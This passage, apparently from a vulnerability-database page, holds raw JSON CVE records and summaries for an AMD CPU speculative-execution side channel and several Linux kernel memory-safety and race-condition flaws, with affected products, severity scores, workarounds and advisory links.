{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-09-23T03:18:32.598Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7005.html" }, { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-7005" }, { "tags": [ "x_transferred" ], "url": "http://xenbits.xen.org/xsa/advisory-434.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/08/08/4" }, { "tags": [ "x_transferred" ], "url": "https://comsec.ethz.ch/research/microarch/inception/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L4E4TZNMLYL2KETY23IPA43QXFAVJ46V/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PKK3IA63LSKM4EC3TN4UM6DDEIOWEQIG/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5475" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240605-0006/" } ], "title": "CVE Program Container", "x_generator": { "engine": "ADPogram 0.0.1" } } ], "cna": { "affected": [ { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 3000 Series Desktop Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 3000 Series Desktop Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 3000 Series Desktop Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 3000 Series Processors with Radeon\u2122 Vega Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Athlon\u2122 3000 Series Processors with Radeon\u2122 Graphics ", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Athlon\u2122 PRO 3000 Series Processors with Radeon\u2122 Vega Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 4000 Series Desktop Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 4000 Series Desktop Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 5000 Series Desktop Processors ", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 5000 Series Desktop Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": "AGESA", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 5000 Series Desktop Processors", "vendor": " ", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 Threadripper\u2122 2000 Series Processors ", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": " Ryzen\u2122 Threadripper\u2122 5000 Series Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 Threadripper\u2122 3000 Series Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Athlon\u2122 3000 Series Mobile Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 5000 Series Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 5000 Series Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 6000 Series Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 PRO 6000 Series Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "packageName": " ", "platforms": [ "x86" ], "product": "Ryzen\u2122 7040 Series Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": "Ryzen\u2122 7000 Series Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": "Ryzen\u2122 7000 Series Processors with Radeon\u2122 Graphics", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": " 1st Gen AMD EPYC\u2122 Processors", "vendor": "AMD ", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": "2nd Gen AMD EPYC\u2122 Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": "3rd Gen AMD EPYC\u2122 Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] }, { "defaultStatus": "affected", "platforms": [ "x86" ], "product": "4th Gen AMD EPYC\u2122 Processors", "vendor": "AMD", "versions": [ { "status": "affected", "version": "various " } ] } ], "datePublic": "2023-08-08T16:30:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA side channel vulnerability on some \u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eof the \u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAMD CPUs may allow an attacker to influence \u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ethe \u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ereturn address prediction\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e. This may\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e result in speculative execution at an attacker-controlled\u202f\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eaddress\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e, potentially leading to information disclosure.\u003c/span\u003e\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" } ], "value": "\n\n\nA side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled\u202faddress, potentially leading to information disclosure.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" } ], "providerMetadata": { "dateUpdated": "2023-08-08T17:02:11.318Z", "orgId": "b58fc414-a1e4-4f92-9d70-1add41838648", "shortName": "AMD" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-7005" }, { "url": "http://xenbits.xen.org/xsa/advisory-434.html" }, { "url": "http://www.openwall.com/lists/oss-security/2023/08/08/4" }, { "url": "https://comsec.ethz.ch/research/microarch/inception/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L4E4TZNMLYL2KETY23IPA43QXFAVJ46V/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PKK3IA63LSKM4EC3TN4UM6DDEIOWEQIG/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html" }, { "url": "https://www.debian.org/security/2023/dsa-5475" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/" }, { "url": "https://security.netapp.com/advisory/ntap-20240605-0006/" } ], "source": { "advisory": "AMD-SB-7005", "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "b58fc414-a1e4-4f92-9d70-1add41838648", "assignerShortName": "AMD", "cveId": "CVE-2023-20569", "datePublished": "2023-08-08T17:02:11.318Z", "dateReserved": "2022-10-27T18:53:39.754Z", "dateUpdated": "2024-09-23T03:18:32.598Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4732
Vulnerability from cvelistv5
Published
2023-10-03 16:55
Modified
2024-09-13 18:24
Severity ?
EPSS score ?
Summary
Kernel: race between task migrating pages and another task calling exit_mmap to release those same pages getting invalid opcode bug in include/linux/swapops.h
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2023:6901 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7077 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7539 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0412 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-4732 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2236982 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:38:00.519Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2023:7539", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7539" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4732" }, { "name": "RHBZ#2236982", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2236982" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.rt7.307.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.36.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-02T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in pfn_swap_entry_to_page in memory management subsystem in the Linux Kernel. In this flaw, an attacker with a local user privilege may cause a denial of service problem due to a BUG statement referencing pmd_t x." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-366", "description": "Race Condition within a Thread", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:24:59.848Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2023:7539", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7539" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4732" }, { "name": "RHBZ#2236982", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2236982" } ], "timeline": [ { "lang": "en", "time": "2023-09-02T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-02T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: race between task migrating pages and another task calling exit_mmap to release those same pages getting invalid opcode bug in include/linux/swapops.h", "workarounds": [ { "lang": "en", "value": "A possible workaround is disabling Transparent Hugepage" } ], "x_redhatCweChain": "CWE-366: Race Condition within a Thread" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-4732", "datePublished": "2023-10-03T16:55:01.864Z", "dateReserved": "2023-09-02T14:19:13.104Z", "dateUpdated": "2024-09-13T18:24:59.848Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3268
Vulnerability from cvelistv5
Published
2023-06-16 00:00
Modified
2024-08-02 06:48
Severity ?
EPSS score ?
Summary
An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:48:08.508Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/1682238502-1892-1-git-send-email-yangpc%40wangsu.com/T/" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "name": "DSA-5448", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=43ec16f1450f4936025a9bdf1a273affdb9732c1" }, { "name": "DSA-5480", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230824-0006/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Kernel version prior to 6.4-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-19T23:07:17.871230", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/1682238502-1892-1-git-send-email-yangpc%40wangsu.com/T/" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "name": "DSA-5448", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=43ec16f1450f4936025a9bdf1a273affdb9732c1" }, { "name": "DSA-5480", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "url": "https://security.netapp.com/advisory/ntap-20230824-0006/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3268", "datePublished": "2023-06-16T00:00:00", "dateReserved": "2023-06-15T00:00:00", "dateUpdated": "2024-08-02T06:48:08.508Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-40283
Vulnerability from cvelistv5
Published
2023-08-14 00:00
Modified
2024-08-02 18:31
Severity ?
EPSS score ?
Summary
An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:31:53.261Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/1728137b33c00d5a2b5110ed7aafb42e7c32e4a1" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.10" }, { "name": "DSA-5480", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "name": "DSA-5492", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231020-0007/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:07:21.176099", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1" }, { "url": "https://github.com/torvalds/linux/commit/1728137b33c00d5a2b5110ed7aafb42e7c32e4a1" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.10" }, { "name": "DSA-5480", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "name": "DSA-5492", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "https://security.netapp.com/advisory/ntap-20231020-0007/" }, { "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-40283", "datePublished": "2023-08-14T00:00:00", "dateReserved": "2023-08-14T00:00:00", "dateUpdated": "2024-08-02T18:31:53.261Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1073
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A memory corruption flaw was found in the Linux kernel’s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.333Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173403" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/id=b12fece4c64857e5fab4290bf01b2e0317a88456" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/osssecurity/2023/01/17/3" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: type confusions on hid report_list entry", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/2" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: NULL pointer dereference in hid_betopff_play()", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory corruption flaw was found in the Linux kernel\u2019s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-05T21:06:16.478573", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173403" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/id=b12fece4c64857e5fab4290bf01b2e0317a88456" }, { "url": "https://www.openwall.com/lists/osssecurity/2023/01/17/3" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: type confusions on hid report_list entry", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/2" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: hid: NULL pointer dereference in hid_betopff_play()", "tags": [ "mailing-list" ], 